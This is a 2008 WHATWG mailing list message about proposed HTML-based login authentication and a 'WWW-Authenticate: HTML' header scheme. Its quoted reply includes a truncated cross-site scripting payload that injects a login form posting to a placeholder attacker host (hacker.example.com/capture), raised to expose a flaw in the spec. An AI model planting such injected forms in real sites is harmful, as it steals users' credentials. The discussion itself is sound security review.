[whatwg] Solving the login/logout problem in HTML

Martin Atkins mart at degeneration.co.uk
Thu Nov 27 00:18:43 PST 2008

Ian Hickson wrote:
> On Wed, 26 Nov 2008, Philip Taylor wrote:
>> If I'm not misunderstanding things, there is a new attack scenario:
>>
>> I post a comment on someone's blog, saying <a
>> href="/restricted-access.php?xsshole=<form
>> action=http://hacker.example.com/capture name=login><input
>>

> Hm, this is indeed a problem.

[snip]

> Is there anyone who can volunteer to edit this section as a separate spec?
>
> I guess I'll remove this section.

I may be forgetting missing some use-cases here (I don't recall what
exactly motivated this custom auth scheme) but there may still be value
in a cut-down version of this scheme:

WWW-Authenticate: HTML

which means (roughly) "The HTML document in the body contains something
that, when displayed in a web browser, will allow the user to log in".

Browsers can then use this authentication scheme in preference to Basic
or Digest when multiple schemes are offered for a particular resource,
and servers can simultaneously offer forms-based authentication and
other authentication schemes at the same endpoint:

HTTP/1.1 401 Unauthorized
WWW-Authenticate: HTML
WWW-Authenticate: Basic realm="my neat site"

<form action="/login" method="POST">
</form>

Software that is not a browser (for some suitable definition of
"browser" -- something along the lines of "user-agent where form-based
auth is the norm"?) can choose to use Basic authentication here.

The backward-compatibility story here is bad as long as one of the
offered authentication schemes is known to a downlevel browser. Per my
basic research posted earlier, other, as-yet-unsupported schemes can be
offered and the body will be rendered as desired except in Opera.

I guess that this could be generalized to:
WWW-Authenticate: Body

meaning merely "the body contains something that will allow the user to
log in". Browsers could presumably in this case take into account the
Content-type when deciding whether to prefer this scheme over the other
schemes offered, for example choosing Body over Basic only when
Content-type is text/html.

I concede that once you generalize it in this way it becomes even less
relevant to the HTML spec than it was to begin with, though I'm not sure
where else to propose such a thing, and in practice as long as websites
are primarily HTML login forms presumably will be as well.